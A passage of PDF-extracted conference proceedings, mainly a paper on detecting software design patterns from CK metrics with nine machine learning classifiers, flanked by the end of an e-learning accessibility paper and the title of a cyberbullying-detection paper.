brain lesion and visual disabled showed the lowest rates due to their handicap in using desktop/notebook devices. Considering that access to desktop/notebook and internet use are the indispensable prerequisites for elearning participation, the development of desktop/notebook devices satisfying their unique needs may be necessary.
The Disabled’s Learning Aspiration and E-Learning Participation
9
References 1. Patzer, Y., Pinkwart, N.: Inclusive E-Learning–towards an integrated system design. Stud. Health Technol. Inform. 242, 878–885 (2017) 2. Hamburg, I., Lazea, M., Marin, M.: Open web-based learning environments and knowledge forums to support disabled people. In: Assoc Prof Pedro Isaias. International Conference on Knowledge-Based and Intelligent Information and Engineering Systems, vol. 1, pp. 205–216. Springer, Berlin, Heidelberg (2003) 3. Cinquin, P.A., Guitton, P., Sauzéon, H.: Online e-learning and cognitive disabilities: a systematic review. Comput. Educ. 130, 152–167 (2019) 4. Lago, E.F., Acedo, S.O.: Factors affecting the participation of the deaf and hard of hearing in e-learning and their satisfaction: a quantitative study. Int. Rev. Res. Open Distrib. Learn. 18(7), 268–297 (2017) 5. Akcil, U., Ünlücan, Ç.: The problems disabled people face in mobile and web based elearning phases in a developing country. Qual. Quant. 52(2), 1201–1210 (2018). https://doi. org/10.1007/s11135-018-0683-z 6. Nganji, J.T.: Designing disability-aware e-learning systems: disabled students recommendations. Int. J. Adv. Sci. Technol. 48(6), 1–70 (2018) 7. Alsalem, G.M., Doush, I.A.: Access education: what is needed to have accessible higher education for students with disabilities in Jordan? Int. J. Spec. Educ. 33(3), 541–561 (2018) 8. Sun, J., Wang, T., Luo, M.: Research on the construction and innovation of lifelong education system under the background of big data. In: 2020 International Conference on Big Data and Informatization Education (ICBDIE), pp. 30–33. IEEE, Zhangjiajie, China (2020) 9. Kwon, Y.-S., Choi, H.-J.: A study on the importance and performance of service quality in lifelong education institutions-focused on adult learners. e-Bus. Stud. 23(1), 203–213 (2022) 10. Kwon, Y.-S., Ryu, K.-H., Song, W.-C., Choi, H.-J.: Using smartphone application to expand the participation in lifelong education for adult disabled. JP J. Heat Mass Trans. Spec. Issue, 111–118 (2020) 11. Lynch, U.: The use of mobile devices for learning in post-primary education and at university: student attitudes and perceptions. Doctoral dissertation, Queens University Belfast (2020) 12. Hussain, F.: E-Learning 3.0 = E-Learning 2.0 + Web 3.0?. In: International Association for Development of the Information Society (IADIS) International Conference on Cognition and Exploratory Learning in Digital Age (CELDA) 2012, pp. 11–18. IADIS, Madrid (2012) 13. Amarneh, B.M., Alshurideh, M.T., Al Kurdi, B.H., Obeidat, Z.: The impact of COVID-19 on e-learning: advantages and challenges. In: Hassanien, A.E., et al. (eds.) AICV 2021. AISC, vol. 1377, pp. 75–89. Springer, Cham (2021). https://doi.org/10.1007/978-3-030-76346-6_8 14. Hosseindoost, S., Khan, Z.H., Majedi, H.: A shift from traditional learning to e-learning: advantages and disadvantages. Arch. Neurosci. 9(2), 1–3 (2022) 15. Coronel, R.S.: Disabled online learners: Benefits and drawbacks of online education and learning platforms when pursuing higher education. Doctoral dissertation, Capella University (2008) 16. Bruck, P.A., Buchholz, A., Karssen, Z., Zerfass, A.: E-Content: Technologies and Perspectives for the European Market. Springer Science & Business Media, Berlin (2006) 17. Oh, Y.-K.: A study on the current status and needs of lifelong education: focused on night school for people with disabilities. J. Soc. Sci. Res. 24, 85–119 (2015) 18. Wald, M., Draffan, E.A., Seale, J.: Disabled learners experiences of e-learning. J. Educ. Multimedia Hypermedia 18(3), 341–361 (2009) 19. Kim, J.Y., Fienup, D.M.: Increasing access to online learning for students with disabilities during the COVID-19 pandemic. J. Spec. Educ. 55(4), 213–221 (2022)
10
S. Lee et al.
20. Vanderheiden, G.-C.: Ubiquitous accessibility, common technology core, and micro assistive technology: commentary on computers and people with disabilities. ACM Trans. Accessible Comput. (TACCESS) 1(2), 1–7 (2008) 21. Kotera, Y., Cockerill, V., Green, P., Hutchinson, L., Shaw, P., Bowskill, N.: Towards another kind of borderlessness: online students with disabilities. Distance Educ. 40(2), 170–186 (2019)
Are CK Metrics Enough to Detect Design Patterns? Gcinizwe Dlamini(B) , Swati Megha, and Sirojiddin Komolov Innopolis University, Innopolis, Tatarstan, Russian Federation [email protected]
Abstract. Design patterns are used to address common design problems in software systems. Several machine learning models have been proposed for detecting and recommending design patterns for a software system. However, limited research is done on using machine learning models for establishing a correlation between design patterns and code quality using ck-metrics. In this paper, we firstly, present a manually labelled dataset composed of 590 open-source software projects primarily from GitHub and GitLab. Secondly, using ck metrics as input of 9 popular machine learning models we predict design patterns. Lastly we evaluated the nine machine learning models using four standard metrics namely, Precision, Recall, Accuracy and F1-Score. Our proposed approach showed noticeable improvement in precision and accuracy. Keywords: Software design Design patterns
1
· Machine learning · Code quality ·
Introduction
In the software engineering domain, design pattern refers to a general solution of the commonly existing design problem [30]. The use and creation of design patterns became popular after the Gang of Four (GoF) published a book [20] in 1994. The authors proposed 23 design patterns to solve different software design problems. Since then, many new design patterns have emerged to solve several design-related problems. Evidence shows that Design Patterns solves design issues however, evidence on the usefulness of design patterns on software products is a continuous research ever since its inception. In the past decade, many studies have been carried out to investigate the usefulness of design patterns on different aspects of software products and the software development process. Studies have shown that the effect of patterns on software quality is not uniform, the same pattern can have both a positive and a negative effect on the quality of a software product [25]. Also, most of the studies are performed on specific software product cases and lacks to present generalized correlation [50]. Currently, software engineers naturally use several design patterns to develop software products. Software systems incorporate several small to large design c The Author(s), under exclusive license to Springer Nature Switzerland AG 2023 K. Arai (Ed.): FICC 2023, LNNS 652, pp. 11–24, 2023. https://doi.org/10.1007/978-3-031-28073-3_2
12
G. Dlamini et al.
patterns aiming to avoid design problems and achieve better software quality. In software development code base gets modified by programmers in a distributed manner. As code base incrementally increases in size and complexity, identifying specific implemented design patterns and the impact on the software quality becomes a complex task. The complexity of design pattern identification emerges due to multiple reasons. Firstly, poor documentation of code. Secondly, programmers implement design patterns according to their understanding and different coding style. Thirdly, design pattern can be broken or changed during a bug fix or software upgrade. Hence documenting them is a challenging job, and that’s why software teams refrains from doing so. Lastly, some design patterns are gets introduced to code base through third-party libraries and open-source software without any explicit class names, comments, or documentation, thus making it hard for programmers to understand. Therefore, to better understand the impact of using a specific design patterns on code quality (i.e. in terms of number of software defects, energy consumption, etc.), it is crucial to first detect the design pattern implemented in the code base independent of documentation. Moreover, design pattern detection contributes in matching them with project requirements [16]. To minimize the complexity of manually design pattern identification and understanding the relation to software quality, systems that can automatically detect and recommend design patterns in a software product should be developed. Sufficient studies have been conducted on using static analyzers for design pattern detection, however static analyzers cannot be considered the optimal solution for the problem due to several drawbacks. Static analyzers use criteria such as class structure for pattern analysis. In case class structures are similar in patterns static analyzers might not identify the patterns correctly. Also imposing strict conditions such as class structure can lead to the elimination of a pattern in case of slight variations [11]. In the case of increasing the measurement matrix, several static rules for the metrics need to be included. Hence with increasing matrix the number of rules also increases and at some point the rule base can be difficult to handle. In recent years, research on using machine learning models for software pattern recommendations and detection have emerged as a reasonable solution to the issue. Hummel and Buger [24] propose a proof of concept-based recommendations system in the paper. Another paper offer the detection of anti-patterns using a machine learning classifier [1]. One more model proposes using graph matching and machine learning techniques for pattern detection. Source code metrics have also been used to detect design patterns [44]. The studies proposing machine learning models for design patterns mostly focus either on detecting patterns in the existing code or recommending patterns based on the existing source code. However, limited research has been conducted on using the Machine learning approach on establishing the correlation between design patterns and software quality, and thereby at present lacks Machine learning models that can present a generalized matrix with evidence.
Are CK Metrics Enough to Detect Design Patterns?
13
To generalize the correlation between the Design pattern and software quality, the experiment must be conducted on several open-source projects rather than specific case studies of an individual software product, At present, we lack quantitative data and evidence on how design patterns can improve the software quality. To fill the domain gap we in this paper propose a machine learning approach to detect DP on open source projects. Collect dataset to be used as a benchmark. The rest of this paper is organized as following. Section 2 overviews design patterns and machine learning approaches for design patterns detection. Section 3 overviews the methodology of our proposed approach to detect design patterns. Section 4 presents the obtained results followed by discussion in Sect. 5. In Sect. 6, the paper is concluded with future research directions.
2
Background and Related Works
This section presents background on design patterns, their categories and design patterns detection approaches. 2.1
Design Patterns Background
Design patterns were created to provide proven solutions to reoccurring design problems in the world of Object-oriented systems. Gang of Four (GoF) itself has proposed 23 different design patterns. The 23 different design patterns are organized into three categories: Structural, Creational, and Behavioural. New design patterns started emerging after the popularity of GoF. A few years later in the year 1996, the authors [38] formalized and documented software architectural styles. They categorized architectural styles and created variants of those styles through careful discrimination. The purpose of these architectural styles was to guide the design of system structures [38]. Design patterns have evolved over the period and at present, we have many available design patterns, therefore organization and classification of design patterns are required for their effective use [21]. In our study, we will focus on analyzing the commonly used design patterns from the Gang of Four [20], the design patterns we will be focusing on are as follows: – Creational design Patterns: The patterns in this category provide ways to instantiate classes and to create objects in complex object-oriented software systems. Examples of Creational design Patterns are Singleton, Builder, Factory Method, Abstract Factory, Prototype, and Object Pool. – Structural design patterns: The patterns in this category deal with assembling classes and objects in large and complex systems keeping them flexible for future updation. Examples of Structural design patterns are Adapter, Bridge, Composite, Decorator, Facade, Flyweight, and proxy.
14
G. Dlamini et al.
– Behavioral design patterns: The patterns in this category deal with interaction, communication, and responsibility assignment among objects at the time of execution. Some of the examples of Behavioural design patterns are Iterator, Memento, Observer, and State. 2.2
Design Patterns Detection
Machine Learning Approach: Over the past decades, several research domains have shown evidence towards the usefulness of ML models and their out-performance over the existing solutions ( [10,39,46]). Machine learning (ML) based approaches have also been adopted in the software engineering domain specifically in the context of design pattern detection. Zanoni et al. [49] proposed a machine learning-based technique to identify five specific design patterns namely, Singleton, Adapter, Composite, Decorator, and Factory method. The authors implemented a design patterns detection approach using Metrics and Architecture Reconstruction Plugin for Eclipse (MARPLE). The presented solution works on micro-structures and metrics that have been measured inside the system. The authors further implemented and evaluated different classification techniques for all five design patterns. The highest accuracy for all five patterns varies from 0.81 to 0.93. The proposed approach has four limitations. Firstly, the training sets used in the experiment are based on a manual design pattern. Secondly, the labeling is done using a limited (10) number of publicly available software projects. Thirdly, the contents of libraries are not included in them. And lastly, Classifier performances are estimated under the assumption that the Joiner has 100% recall. Another research [40] proposed a deep learning-driven approach to detect six design patterns (Singleton, Factory Method, Composite, Decorator, Strategy, and Template method). For detection, the researchers [40] retrieved the source code given as an abstract semantic graph and extracted features to be used as the input to the deep learning model. The procedure extracted micro-structures within the abstract semantic graph. These microstructures are used then for the candidate sampling process. Candidate mappings fulfill the basic structural properties that a pattern has hence qualify for the detailed analysis via the inference method. The detection step takes the candidate role mappings and decides whether they are a specific pattern or not. The authors in addition to deep learning methods used three more machine learning techniques (Nearest Neighbor, Decision Trees, and Support Vector Machines) to detect the design patterns. Nine open source repositories with design patterns as a data set. The accuracy of final models for each pattern varies from 0.754 to 0.985. Satoru et al. [45] proposed design patterns detection techniques using source code metrics and machine learning. The authors proposed an approach aimed at identifying five design patterns (Singleton, Template method, Adapter, State, and Strategy). The researchers [45] derived experimental data into small-scale and large-scale codes and found a different set of metrics for two types of data. For the classification of the design patterns, a neural network was used. The F-measure of the proposed technique varies from 0.67 to 0.69 depending on
Are CK Metrics Enough to Detect Design Patterns?
15
the design pattern, but the solution shows some limitations, as it is unable to distinguish patterns in which the class structures are similar. Also, the number of patterns that could be recognized by the proposed technique is limited to five patterns. Graph Theory Approach: Graph theory is the study of graphs that are being formed by vertices and edges connecting the vertices [7]. It is one of the fundamental courses in the field of computer science. Graphs can be used to represent and visualize relationship(s) between components in a problem definition or solution. The concepts of graph theory have successfully been employed in solving complex problems in domains such as Linguistics [22], Social sciences [5], Physics [17] and chemistry [9]. In the same way, software engineers have adopted the principles of graph theory in solving tasks such as design patterns detection (i.e. [4,32,48]). One of the graph theory-based state-of-the-art approaches to detect design patterns was proposed by Bahareh et al. [4]. The authors proposed a new method for the detection. Their proposed model is based on the semantic graphs and the pattern signature that characterize each design pattern. The proposed two-phase approach was tested on three open-source benchmark projects: JHotDraw 5.1, JRefactory 2.6.24, and JUnit 3.7. To address the challenges faced by existing pattern detection methodologies, Bahareh et al. [43] proposed a graph-based approach for design patterns detection. The main challenges addressed by their proposed approach are the identification of modified pattern versions and search space explosion for large systems. Bahareh et al. [43] approach leverages similarity scoring between graph vertices. The researchers in their proposed approach [32] performed a similar series of experiments using a sub-graph isomorphism approach in FUJABA [31] environment. The main goal for the researchers was to address scalability problems that emerged because of variants of design patterns implementation. The proposed approach was validated on only two major Java libraries which is not quite enough the establish the effectiveness of the authors [32] proposed method. In light of all the aforementioned approaches proposed by researchers in the studies above there still exist a research gap in terms of lack of benchmark data for evaluation. Thus in this paper, we present the first step in benchmark dataset creation and comparison of machine learning methods evaluated on the dataset.
3
Methodology
Our proposed model pipeline presented in Fig. 1 contains four main stages: A. B. C. D.
Data Extraction Data Preprossessing ML model definition and training Performance Measuring The following sections presents the details about each stage.
16
G. Dlamini et al.
Train Dataset GitHub
Data Preprocessing Feature Selection
GitLab
Test Training Random Forest
Neural Network
Precision
Recall
Logistic Regression
....
Train Model(s)
Performance F1 Score
Accuracy
Testing
Stage Transition
Fig. 1. The proposed design patterns detection pipeline.
3.1
Data Extraction
A significant part of the dataset is extracted from two popular version control systems, namely GitHub1 and GitLab2 . The repositories were manually retrieved by interns in the software engineering laboratory at Innopolis University. The repositories were manually labeled by the laboratory researchers. The target programming language for the source code in all projects included in the dataset is Java. In addition to these version control systems, the student’s projects from the University (Innopolis University) were also added to the dataset. The projects from the students were produced in the scope of a upper-division bachelor course “System Software Design” (SSD). In this course, the students were taught different design patterns and were required to design and implement a system applying at least one design pattern from GoF as a part of course evaluation. For each project source code, the metrics proposed by Chidamber and Kemerer [12], now referred to as the CK metrics were extracted and served as input data for machine learning models. In this step, the CK metrics data were extracted for each project source code. To extract the CK metrics open source tool was used [3]. 3.2
Data Preprocessing
Data preprocessing is an essential part of curating the data for further processing. All the CK metrics are numerical. The numerical attributes are normalized over a zero mean and unit variance. Data normalizing procedure standardize the input vectors, and helps the machine learning model in the learning process. 1 2
https://github.com. https://gitlab.com.
Are CK Metrics Enough to Detect Design Patterns?
17
Moreover, the mean and standard deviations are also stored to transform the input data during the testing phase. The transforming and re-scaling of the input data is important for the performance of models such as neural networks and distance calculating model’s (i.e., k-nearest neighbor, SVM) [19]. Furthermore, the mean and standard deviation is also stored to transform the input data during the testing phase. To improve the performance of the machine models, the original dataset was balanced using algorithm called : Oversample using Adaptive Synthetic (ADASYN) [23]. 3.3
Machine Learning Models
To detect the type of design pattern, we employ machine learning and deep learning methods. For deep learning approaches we use simple ANN and for traditional ML models use models from different classifier families. The models used in this paper, along with the families they belong to, are as follows: – – – – – – – –
Tree Methods : Decision tree (DT) [36] Ensemble Methods : Random Forest [8] Gradient Boosting : Catboost [14] Generalized Additive Model : Explainable Boosting Machine [28] Probabilistic Methods : Naive bayes [41] Deep Learning : Artificial neural network [42] Linear models : Logistic Regression [26] Other : K-NN [18] & Support vector machine (SVM) [37]
The Python library called sklearn (version 0.21.2) implementation is used for the chosen ML models [34]. To set benchmark performance for classifiers, we used default training parameters set by sklearn Python library. The python library interpretml [33] is used for explainable gradient boosting classifier implementation. 3.4
Performance Metrics
Five standard performance metrics are used in this paper, namely: Precision, Recall, F1-score, weighted F1-score and Accuracy. They are calculated using values of a confusion matrix and computed as follows: P recision = Recall = F 1 − score = 2
TP (T P + F P )
TP (T P + F N ) P recision ∗ Recall P recision + Recall
(1) (2) (3)
18
G. Dlamini et al.
K
W eighted F 1 − score = Accuracy =
i=1
Supporti · F 1i (4)
T otal
TP + TN (T P + T N + F P + F N )
(5)
where, TN is the number of true negative, TP is the number of true positives, FP is the number of false positives, FN is the number of false negatives, Support is the number of samples with a given label i and F 1i is F1 score of a given label i.
4 4.1
Implementation Details and Results Dataset Description
After retrieving the data from GitHub, GitLab, and students projects, we compiled the dataset. The summary of the compiled dataset is presented in Table 1. We then split the full dataset into train and test sets. Table 1. Train and test data distribution Class
4.2
Training set Percentage Test set Percentage
Creational 282 86 Structural Behavioural 104
59.7% 18.2% 22.1%
38 38 42
32.2% 32.2% 35.5%
Total
100%
118
100%
472
Experiments
The experiments were carried out on an Intel core i5 CPU with 8 GB RAM. A Python library called sklearn (version 0.24.1) [34] was used for training and testing the models. Furthermore, we used default training parameters set by sklearn Python library for all the machine learning models. The obtained results after conducting experiments are summarized in Table 2 for creational design patterns, Table 3 for structural design patterns and Table 4 for behavioral patterns. For each experiment conducted the models ML models were trained with balanced data using ADASYN.
Are CK Metrics Enough to Detect Design Patterns? Table 2. Detection of creational patterns Classifiers
Precision Recall Accuracy F1-score
LR
0.76
0.71
0.71
0.72
Naive Bayes
0.73
0.69
0.69
0.70
SVM
0.80
0.77
0.77
0.78
Decision Tree
0.72
0.64
0.64
0.66
Random Forest
0.75
0.68
0.68
0.69
Neural Networks
0.76
0.76
0.76
0.76
k-NN
0.82
0.80
0.80
0.80
Catboost
0.75
0.66
0.66
0.67
Explainable Boosting Classifier 0.76
0.66
0.66
0.67
Table 3. Detection of structural patterns Classifiers
Precision Recall Accuracy F1-score
LR
0.62
0.55
0.55
0.57
Naive Bayes
0.74
0.61
0.61
0.62
SVM
0.60
0.56
0.56
0.57
Decision Tree
0.56
0.57
0.57
0.57
Random Forest
0.54
0.62
0.62
0.56
Neural Networks
0.63
0.61
0.61
0.62
k-NN
0.56
0.52
0.52
0.53
Catboost
0.54
0.58
0.58
0.56
Explainable boosting classifier 0.67
0.68
0.68
0.67
Table 4. Detection of behavioral patterns Classifiers
Precision Recall Accuracy F1-score
LR
0.66
0.65
0.65
0.66
Naive Bayes
0.69
0.65
0.65
0.66
SVM
0.68
0.68
0.68
0.68
Decision Tree
0.61
0.63
0.63
0.62
Random Forest
0.67
0.68
0.68
0.67
Neural Networks
0.67
0.69
0.69
0.67
k-NN
0.70
0.64
0.64
0.65
Catboost
0.64
0.66
0.66
0.64
Explainable Boosting Classifier 0.60
0.64
0.64
0.60
19
20
G. Dlamini et al. Table 5. Multi-class classification accuracy
Classifier
SMOTEENN SMOTE BorderlineSMOTE ADASYN Original SVMSMOTE
LR
0.53
0.51
0.52
0.52
0.39
0.47
Decision Tree
0.49
0.39
0.44
0.52
0.47
0.37
EBM
0.54
0.53
0.52
0.50
0.38
0.52
Random Forest 0.53
0.46
0.53
0.52
0.44
0.47
Catboost
0.48
0.45
0.48
0.43
0.40
0.42
Neural Network 0.35
0.41
0.44
0.42
0.52
0.39
k-NN
0.53
0.54
0.54
0.54
0.52
0.56
SVM
0.53
0.53
0.51
0.53
0.34
0.48
Naive Bayes
0.53
0.54
0.58
0.55
0.50
0.48
5
Discussion
This section presents discussions of the results reported in Sect. 4, limitations, and our proposed approach threats to validity. For creational design patterns using One-vs-Rest rest all the methods achieve good performance with k-NN having outstanding performance based on all selected evaluation metrics. Based on the objective for detecting creational design, an explainable boosting classifier is the best choice when deeper understanding through a piece of source code was classified as creational sense. In some other cases, design patterns are implemented with modification. Based on computational resources budget other approaches can be selected (i.e. Naive Bayes is computationally cheaper when compared to neural network and SVM). The algorithms showed insignificant results on structural and behavioral design patterns than creational design patterns. While Explainable Boosting Classifier showed outperforming results on the structural patterns than other methods, the algorithms on the behavioral design patterns did a relatively equal job except for Catboost and Explainable boosting classifier. We can only highlight the SVM and Neural networks that showed slightly better results. This tendency can be explained through the fact of data imbalance, and relatively smaller data samples for structural and behavioral patterns. Although this tendency might seem the limitation of the current paper, it also shows that the chosen method works, since the results are improving on the bigger datasets (i.e. creational design patterns). So, overall results show that more resources are required on small datasets since SVM and Neural networks need high computational processes. We might argue that machine learning and deep learning-based approaches are a black box and it might not help in understanding what leads to the detection of specific design patterns in comparison to graph-based approaches. However, researchers over the years have proposed a new research direction which is named interpretable/explainable machine learning. As a result methods such as LIME [35], interpret [33] and SHARP [29] have been developed. In our experiment, we have employed an explainable boosting classifier (EBM) as a step
Are CK Metrics Enough to Detect Design Patterns?
21
towards explainable design patterns detection methods. The use of models as EBM can help in the identification of semantic relationships among design patterns. From Table 1 and 5 the main disadvantage of preliminary our data set is imbalanced. To minimize the impact of the dataset on the machine learning models we have balanced the data using ADASYN which is one of the popular approaches for balancing datasets in the machine learning domain. The results multi-class classification using balanced data and comparison with other data balancing techniques in presented in Table 5. We are aimed at increasing the dataset in the future by collecting and labeling more java projects from GitHub as well as innopolis university. We are also considering using other techniques to increase the dataset such as statistical and deep learning-based [13,15,27,47,51].
6
Conclusion
Drawing a relationship between software quality and design patterns is a complex task. In this paper, we present the first step towards the analysis of the impact of design patterns on software quality. Firstly, we propose a machine learningbased approach for detecting design patterns from source code using CK metrics. Our machine learning-based approach detects design patterns and validated its performance using precision, recall, accuracy and f1-score. Secondly, we compiled a dataset that can serve as a bench-marking dataset for design patterns detection approaches. The dataset was compiled from openly available GitLab, GitHub repositories and innopolis university 3rd-year students projects. Overall the dataset has 590 records which can be used to train and test machine learning models. The achieved results suggests that using ck metics as input to machine learning models, design patterns can be detected from source code. For future works, we plan to use code embeddings [2] and granular computing techniques such as fuzzy c-means [6] since some other projects and real-life projects do not only implement a single design pattern. We also plan to increase the size of the dataset by collecting mode data and also using statistical and deep learning approaches [13,27].
References 1. Akhter, N., Rahman, S., Taher, K.A.: An anti-pattern detection technique using machine learning to improve code quality. In: 2021 International Conference on Information and Communication Technology for Sustainable Development (ICICT4SD), pp. 356–360 (2021) 2. Alon, U., Zilberstein, M., Levy, O., Yahav, E.: code2vec: learning distributed representations of code. In: Proceedings of the ACM on Programming Languages, vol. 3, no. POPL, pp. 1–29 (2019) 3. Aniche, M.: Java code metrics calculator (CK) (2015). https://github.com/ mauricioaniche/ck/ 4. Bahareh Bafandeh Mayvan and Abbas Rasoolzadegan: Design pattern detection based on the graph theory. Knowl.-Based Syst. 120, 211–225 (2017)
22
G. Dlamini et al.
5. Barnes, J.A.: Graph theory and social networks: a technical comment on connectedness and connectivity. Sociology 3(2), 215–232 (1969) 6. Bezdek, J.C., Ehrlich, R., Full, W.: FCM: the fuzzy c-means clustering algorithm. Comput. Geosci. 10(2–3), 191–203 (1984) 7. Bollob´ as, B.: Modern Graph Theory, vol. 184. Springer, Heidelberg (2013) 8. Breiman, L.: Random forests. Mach. Learn. 45(1), 5–32 (2001) 9. Burch, K.J.: Chemical applications of graph theory. In: Blinder, S.M., House, J.E (eds.) Mathematical Physics in Theoretical Chemistry, Developments in Physical and Theoretical Chemistry, pp. 261–294. Elsevier (2019) 10. Carbonneau, R., Laframboise, K., Vahidov, R.: Application of machine learning techniques for supply chain demand forecasting. Eur. J. Oper. Res. 184(3), 1140– 1154 (2008) 11. Chaturvedi, S., Chaturvedi, A., Tiwari, A., Agarwal, S.: Design pattern detection using machine learning techniques. In: 2018 7th International Conference on Reliability, Infocom Technologies and Optimization (Trends and Future Directions) (ICRITO), pp. 1–6. IEEE (2018) 12. Chidamber, S.R., Kemerer, C.F.: A metrics suite for object oriented design. IEEE Trans. Softw. Eng. 20(6), 476–493 (1994) 13. Dlamini, G., Fahim, M.: Dgm: a data generative model to improve minority class presence in anomaly detection domain. Neural Comput. Appl. 33, 1–12 (2021) 14. Dorogush, A.V., Ershov, V., Gulin, A.: Catboost: gradient boosting with categorical features support. arXiv preprint arXiv:1810.11363 (2018) 15. Douzas, G., Bacao, F.: Effective data generation for imbalanced learning using conditional generative adversarial networks. Expert Syst. Appl. 91, 464–471 (2018) 16. Eckert, K., Fay, A., Hadlich, T., Diedrich, C., Frank, T., Vogel-Heuser, B.: Design patterns for distributed automation systems with consideration of non-functional requirements. In: Proceedings of 2012 IEEE 17th International Conference on Emerging Technologies & Factory Automation (ETFA 2012), pp. 1–9. IEEE (2012) 17. Essam, J.W.: Graph theory and statistical physics. Disc. Math. 1(1), 83–112 (1971) 18. Fix, E., Hodges, J.L.: Discriminatory analysis. nonparametric discrimination: consistency properties. Int. Stat. Rev./Revue Internationale de Statistique 57(3), 238– 247 (1989) 19. Friedman, J.H.: The Elements of Statistical Learning: Data Mining, Inference, and Prediction. Springer, Heidelberg (2017) 20. Gamma, E.: Design Patterns: Elements of Reusable Object-Oriented Software. Pearson Education India (1995) 21. Gamma, E., Helm, R., Johnson, R., Vlissides, J.: Design patterns: abstraction and reuse of object-oriented design. In: Nierstrasz, O.M. (ed.) ECOOP 1993. LNCS, vol. 707, pp. 406–431. Springer, Heidelberg (1993). https://doi.org/10.1007/3-54047910-4 21 22. Hale, S.A.: Multilinguals and wikipedia editing. In: Proceedings of the 2014 ACM Conference on Web Science, WebSci 2014, New York, NY, USA, pp. 99–108. Association for Computing Machinery (2014) 23. He, H., Bai, Y., Garcia, E.A., Li, S.: Adasyn: adaptive synthetic sampling approach for imbalanced learning. In: 2008 IEEE International Joint Conference on Neural Networks (IEEE World Congress on Computational Intelligence), pp. 1322–1328. IEEE (2008) 24. Hummel, O., Burger, S.: Analyzing source code for automated design pattern recommendation. In: Proceedings of the 3rd ACM SIGSOFT International Workshop on Software Analytics, SWAN 2017, New York, NY, USA, pp. 8–14. Association for Computing Machinery (2017)
Are CK Metrics Enough to Detect Design Patterns?
23
25. Khomh, F., Gueheneuc, Y.G.: Do design patterns impact software quality positively? In: 2008 12th European Conference on Software Maintenance and Reengineering, pp. 274–278 (2008) 26. Kotu, V., Deshpande, B.: Regression methods. In: Kotu, V., Deshpande, B. (eds.) Predictive Analytics and Data Mining, pp. 165–193. Morgan Kaufmann, Boston (2015) 27. Lemaˆıtre, G., Nogueira, F., Aridas, C.K.: Imbalanced-learn: a python toolbox to tackle the curse of imbalanced datasets in machine learning. J. Mach. Learn. Res. 18(1), 559–563 (2017) 28. Lou, Y., Caruana, R., Gehrke, J., Hooker, G.: Accurate intelligible models with pairwise interactions. In: Proceedings of the 19th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, pp. 623–631 (2013) 29. Lundberg, S.M., Lee, S.I.: A unified approach to interpreting model predictions. In: Guyon, I., et al. (eds.) Advances in Neural Information Processing Systems, vol. 30, pp. 4765–4774. Curran Associates, Inc. (2017) 30. Martin, R.C.: Design principles and design patterns. Obj. Mentor 1(34), 597 (2000) 31. Nickel, U., Niere, J., Z¨ undorf, A.: The fujaba environment. In: Proceedings of the 22nd International Conference on Software Engineering, pp. 742–745 (2000) 32. Niere, J., Sch¨ afer, W., Wadsack, J.P., Wendehals, L., Welsh, J.: Towards patternbased design recovery. In: Proceedings of the 24th International Conference on Software Engineering, pp. 338–348 (2002) 33. Nori, H., Jenkins, S., Koch, P., Caruana, R.: Interpretml: a unified framework for machine learning interpretability. arXiv preprint arXiv:1909.09223 (2019) 34. Pedregosa, F., et al.: Scikit-learn: machine learning in python. J. Mach. Learn. Res. 12, 2825–2830 (2011) 35. Ribeiro, M.T., Singh, S., Guestrin, C.: “why should i trust you?” explaining the predictions of any classifier. In: Proceedings of the 22nd ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, pp. 1135–1144 (2016) 36. Safavian, R., Landgrebe, D.: A survey of decision tree classifier methodology. IEEE Trans. Syst. Man Cybern. 21(3), 660–674 (1991) 37. Sch¨ olkopf, B., Smola, A.J., Williamson, R.C., Bartlett, P.L.: New support vector algorithms. Neural Comput. 12(5), 1207–1245 (2000) 38. Shaw, M., Clements, P.: A field guide to boxology: preliminary classification of architectural styles for software systems. In: Proceedings Twenty-First Annual International Computer Software and Applications Conference (COMPSAC 1997), pp. 6–13 (1997) 39. Shoeb, A.H., Guttag, J.V.: Application of machine learning to epileptic seizure detection. In: ICML (2010) 40. Thaller, H.: Towards Deep Learning Driven Design Pattern Detection/submitted by Hannes Thaller. PhD thesis, Universit¨ at Linz (2016) 41. Theodoridis, S.: Bayesian learning: approximate inference and nonparametric models. In: Theodoridis, S. (ed.) Machine Learning, pp. 639–706. Academic Press, Oxford (2015) 42. Theodoridis, S.: Neural networks and deep learning. In: Theodoridis, S. (ed.) Machine Learning, pp. 875–936. Academic Press, Oxford (2015) 43. Tsantalis, N., Chatzigeorgiou, A., Stephanides, G., Halkidis, S.T.: Design pattern detection using similarity scoring. IEEE Trans. Softw. Eng. 32(11), 896–909 (2006) 44. Uchiyama, S., Kubo, A., Washizaki, H., Fukazawa, Y.: Detecting design patterns in object-oriented program source code by using metrics and machine learning. J. Softw. Eng. Appl. 7, 01 (2014)
24
G. Dlamini et al.
45. Uchiyama, S., Washizaki, H., Fukazawa, Y., Kubo, A.: Design pattern detection using software metrics and machine learning. In: First International Workshop on Model-Driven Software Migration (MDSM 2011), p. 38 (2011) 46. Worden, K., Manson, G.: The application of machine learning to structural health monitoring. Phil. Trans. Royal Soc. A: Math. Phys. Eng. Sci. 365(1851), 515–537 (2007) 47. Yang, Y., Zheng, K., Chunhua, W., Yang, Y.: Improving the classification effectiveness of intrusion detection by using improved conditional variational autoencoder and deep neural network. Sensors 19(11), 2528 (2019) 48. Yu, D., Ge, J., Wu, W.: Detection of design pattern instances based on graph isomorphism. In: 2013 IEEE 4th International Conference on Software Engineering and Service Science, pp. 874–877 (2013) 49. Zanoni, M., Fontana, F.A., Stella, F.: On applying machine learning techniques for design pattern detection. J. Syst. Softw. 103, 102–117 (2015) 50. Zhang, C., Budgen, D.: What do we know about the effectiveness of software design patterns? IEEE Trans. Softw. Eng. 38(5), 1213–1231 (2012) 51. Zhu, T., Lin, Y., Liu, Y.: Synthetic minority oversampling technique for multiclass imbalance problems. Pattern Recogn. 72, 327–340 (2017)
Detecting Cyberbullying from Tweets Through Machine Learning Techniques with Sentiment Analysis Jalal Omer Atoum(B) Department of Computer Science, The University of Texas at Dallas, Dallas, USA [email protected]
